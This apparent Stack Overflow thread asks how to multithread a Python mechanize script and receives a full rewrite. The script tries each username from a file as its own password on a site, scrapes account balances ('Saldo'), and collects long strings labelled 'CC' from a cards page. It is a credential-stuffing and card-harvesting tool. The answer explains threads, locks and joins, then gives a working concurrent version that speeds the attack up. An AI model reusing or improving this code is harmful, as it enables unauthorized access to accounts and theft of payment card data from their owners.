I'm trying to make this script multithreaded, without success. I'm new to Python; can someone help me with this? The requests work, but the script is too slow.

import mechanize
from bs4 import BeautifulSoup as BS
entrada="entrada.txt"
saida="saida.txt"
def escreve(texto):
    with open(saida, "a") as myfile:
        myfile.write(texto)

with open(entrada) as fp:
    for user in fp:
        try:
            user = user.rstrip()
            cont=1
            br = mechanize.Browser()
            br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] 
            ua = 'Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 (compatible;)'
            br.set_handle_robots(False)
            br.open("https://site")  
            br.select_form(nr=0)
            br['username']=user
            br['password']= user
            response = br.submit()
            soup = BS(br.response().read(),'lxml')
            value = soup.find_all('a')
            txt = "\nConta - Saldo[" + value[2].text+"]\n"
            print txt
            escreve(txt)
            response = br.open("https://test/sub/") 
            soup2 = BS(br.response().read(),'lxml')
            txt = "Procurando por cartoes na conta"
            print txt
            escreve(txt)
            for tds in soup2.find_all('td'):
                if (len(tds.text)>30):
                    cc = "CC["+str(cont)+"] ~> " + tds.text+"\n"
                    print cc
                    escreve(cc)
                    cont+=1
            txt = "\nTotal ["+str(cont-1)+"]\n-------------------------------------------------\n"
            escreve(txt)
        except Exception: 
            erro =  "\n[!]Erro ao logar["+user+"]\n-------------------------------------------------\n"
            escreve(erro)
            print erro

This script logs in and scrapes some info. The code works fine, but it is too slow. Thanks in advance!

Leandro Campos
  • You could have a look at [this question](http://stackoverflow.com/q/2846653/1585957) about multi-threading in Python. Try to rewrite your code so that it's multi-threaded and if you have issues with something in particular you can ask about that. Stackoverflow doesn't create/write code for you. – bmcculley Apr 26 '16 at 13:58
  • Since you have lxml installed why not use that to parse? – Padraic Cunningham Apr 26 '16 at 14:21

1 Answer

As bmcculley has mentioned, you can refer to this question, or you can refer to the docs.

How to multithread

Multithreading in Python can be done through the threading module. For your case, you will need to know how to create threads, how to lock them and how to join them.

Create a thread

To create a thread, you will need to make a class for your thread. The class will subclass threading.Thread.

import threading
class MyThread(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)
    def run(self):
        # Your code here
        pass

You can add arguments as a normal class would have as well.
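As a minimal sketch of passing arguments, the hypothetical GreetThread class below stores its arguments on the instance in __init__ and reads them back in run(). The class name, the arguments and the shared results list are assumptions made for illustration; start() and join() are explained in the sections that follow. The function form print(...) is used so that the sketch runs on both Python 2 and Python 3.

```python
import threading

class GreetThread(threading.Thread):
    # Hypothetical example class; the names are illustrative only.
    def __init__(self, name_to_greet, results):
        threading.Thread.__init__(self)
        # Keep the arguments on the instance so run() can reach them
        self.name_to_greet = name_to_greet
        self.results = results

    def run(self):
        # run() takes no arguments, so it reads them from self
        self.results.append("Hello, " + self.name_to_greet)

results = []
thread = GreetThread("world", results)
thread.start()
# Wait for the thread to finish before reading its result
thread.join()
print(results[0])
```

Anything the thread needs (a user name, an output file, a lock) can be handed over this way.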

Run a thread

After you create a class for your thread, you can then make a thread:

thread = MyThread()

and run it:

thread.start()

Locking multiple threads

Locking prevents threads from using a resource at the same time. This is needed in your case because your threads will be writing to saida.txt and printing to standard output.

Let's say you have a thread WriteThread that writes some text to a file:

import threading
class WriteThread(threading.Thread):
    def __init__(self, text, output):
        threading.Thread.__init__(self)
        self.text = text
        self.output = output
    def run(self):
        # Use the attributes stored on the instance
        self.output.write(self.text)

with open("output.txt", "a+") as f:
    # Create threads
    thread_a = WriteThread("foo", f)
    thread_b = WriteThread("bar", f)
    # Start threads
    thread_a.start()
    thread_b.start()
    # Wait for both threads before the file is closed
    thread_a.join()
    thread_b.join()

The program may still work but it is not a good idea to allow them to access the same file concurrently. Instead, a lock is used when thread_a is writing to the file to prevent thread_b from writing to the file.

import threading
file_lock = threading.Lock()
class WriteThread(threading.Thread):
    def __init__(self, text, output):
        threading.Thread.__init__(self)
        self.text = text
        self.output = output
    def run(self):
        # Acquire Lock
        file_lock.acquire()
        # Use the attributes stored on the instance
        self.output.write(self.text)
        # Release Lock
        file_lock.release()

with open("output.txt", "a+") as f:
    # Create threads
    a = WriteThread("foo", f)
    b = WriteThread("bar", f)
    # Start threads
    a.start()
    b.start()
    # Wait for both threads before the file is closed
    a.join()
    b.join()

What file_lock.acquire() means is that, if another thread is holding file_lock, the thread will wait until that thread releases it before using the file.
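A lock can also be used in a with statement, which acquires it on entry and releases it on exit, even if the code inside raises an exception. The sketch below is only an illustration: the shared counter, the add_many function and the thread count are assumptions, standing in for any resource that several threads update.

```python
import threading

counter_lock = threading.Lock()
# Hypothetical shared resource updated by several threads
counter = {"value": 0}

def add_many(times):
    for _ in range(times):
        # Acquired on entry, released on exit of the with block
        with counter_lock:
            counter["value"] += 1

threads = [threading.Thread(target=add_many, args=(10000,)) for _ in range(4)]
for t in threads:
    t.start()
for t in threads:
    t.join()

print(counter["value"])
```

Because every increment happens while the lock is held, no update is lost and the final value equals the number of threads times the number of increments per thread.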

Joining multiple threads

Joining is a way to synchronize threads. Calling join() on a thread makes the caller wait until that thread has finished, so joining every thread means the program proceeds only after all of them are complete.

Let's say I have two threads that have different code execution times and I want both of them to complete whatever they are doing before proceeding.

import threading
import time
class WaitThread(threading.Thread):
    def __init__(self, time_to_wait, text):
        threading.Thread.__init__(self)
        self.time_to_wait = time_to_wait
        self.text = text
    def run(self):
        # Wait!
        time.sleep(self.time_to_wait)
        print self.text

# Thread will wait for 1 second before it finishes
thread_a = WaitThread(1, "Thread a has ended!")
# Thread will wait for 2 seconds before it finishes
thread_b = WaitThread(2, "Thread b has ended!")

threads = []
threads.append(thread_a)
threads.append(thread_b)

# Start threads
thread_a.start()
thread_b.start()

# Join threads
for t in threads:
    t.join()

print "Both threads have ended!"

In this example, thread_a will print before thread_b does. However, print "Both threads have ended!" will execute only after both thread_a and thread_b have printed.
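join() also accepts an optional timeout in seconds, which may be useful when a thread could hang on a slow network request. join() itself does not report whether the timeout expired, so is_alive() is checked afterwards. This is a small sketch; slow_task and the chosen delays are assumptions made for illustration.

```python
import threading
import time

def slow_task():
    # Hypothetical stand-in for a slow request
    time.sleep(0.5)

worker = threading.Thread(target=slow_task)
worker.start()

# Wait at most 0.05 seconds, then check whether the thread is done
worker.join(0.05)
still_running = worker.is_alive()
print("Still running after the timeout: " + str(still_running))

# Wait without a timeout until the thread has really finished
worker.join()
finished = not worker.is_alive()
print("Finished: " + str(finished))
```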

Application

Now, back to your code.

I have made quite a few changes besides implementing multithreading, locking and joining, but the whole idea is to have two locks (one for printing and one for writing to your file) and to run the threads in batches of a limited size. (Too many threads is not good! Refer to this question.)

import mechanize
from bs4 import BeautifulSoup as BS
import threading

# Max no. of threads allowed to be alive.
limit = 10

entrada = "entrada.txt"
saida = "saida.txt"

def write(text):
    with open(saida, "a") as f:
        f.write(text)

# Threading locks
fileLock = threading.Lock()
printLock = threading.Lock()

def print_out(text):
    printLock.acquire()
    print text
    printLock.release()

# Thread for each user
class UserThread(threading.Thread):
    def __init__(self, user):
        threading.Thread.__init__(self)
        self.user = user.rstrip()
    def run(self):
        to_file = ""
        try:
            cont = 1

            # Initialize Mechanize
            br = mechanize.Browser()
            br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] 
            br.set_handle_robots(False)
            br.open("https://site")

            # Submit form
            br.select_form(nr=0)
            br["username"] = self.user
            br["password"] = self.user
            br.submit()

            # Soup Response
            soup = BS(br.response().read(), "lxml")
            value = soup.find_all("a")
            # Write to file
            txt = "\nConta - Saldo["+value[2].text+"]\n"
            print_out(txt)
            to_file += txt

            # Retrieve response from another page
            br.open("https://test/sub")
            soup = BS(br.response().read(), "lxml")
            # Write to file
            txt = "Procurando por cartoes na conta"
            print_out(txt)
            to_file += txt


            for tds in soup.find_all("td"):
                if len(tds.text) > 30:
                    # Write to file
                    cc = "CC["+str(cont)+"] ~> "+tds.text+"\n"
                    print_out(cc)
                    to_file += cc
                    cont += 1

            txt = "\nTotal ["+str(cont-1)+"]\n-------------------------------------------------\n"
            to_file += txt
        except Exception:
            erro = "\n[!]Erro ao logar["+self.user+"]\n-------------------------------------------------\n"
            to_file += erro
            print_out(erro)

        # Write everything to file
        fileLock.acquire()
        write(to_file)
        fileLock.release()

threads = []

with open(entrada) as fp:
    for user in fp:
        threads.append(UserThread(user))

active_threads = []
for thread in threads:
    # Start threads
    thread.start()
    active_threads.append(thread)
    if len(active_threads) >= limit:
        for t in active_threads:
            # Wait for everything to complete before moving to next set
            t.join()
        active_threads = []

# Wait for the last, possibly incomplete, set
for t in active_threads:
    t.join()

Minor Edits:
Changed all single quotes to double quotes
Added spacings between operators and where needed
Removed unused variable ua
Replaced the unused assignments response = br.submit() and response = br.open("https://test/sub") with br.submit() and br.open("https://test/sub")
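Another way to cap how many threads work at once is a semaphore, which is a different technique from the batches used in the code above. The sketch below is an assumption-laden illustration, not a drop-in replacement: process_user is a hypothetical stand-in for the login-and-scrape work, and the state dictionary exists only to show that the limit holds.

```python
import threading
import time

limit = 3  # Max no. of threads allowed to work at the same time
slots = threading.BoundedSemaphore(limit)
state_lock = threading.Lock()
state = {"running": 0, "peak": 0, "done": 0}

def process_user(user):
    # Hypothetical stand-in for the login-and-scrape work
    with slots:  # blocks while `limit` threads are already inside
        with state_lock:
            state["running"] += 1
            state["peak"] = max(state["peak"], state["running"])
        time.sleep(0.01)  # pretend to do network I/O
        with state_lock:
            state["running"] -= 1
            state["done"] += 1

users = ["user%d" % i for i in range(12)]
threads = [threading.Thread(target=process_user, args=(u,)) for u in users]
for t in threads:
    t.start()
for t in threads:
    t.join()

print("Processed %d users, at most %d at a time" % (state["done"], state["peak"]))
```

With a semaphore, a new thread starts working as soon as any slot frees up, instead of waiting for a whole batch to finish. Note that all thread objects are still created up front; only the work inside the with block is limited.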

Moon Cheesez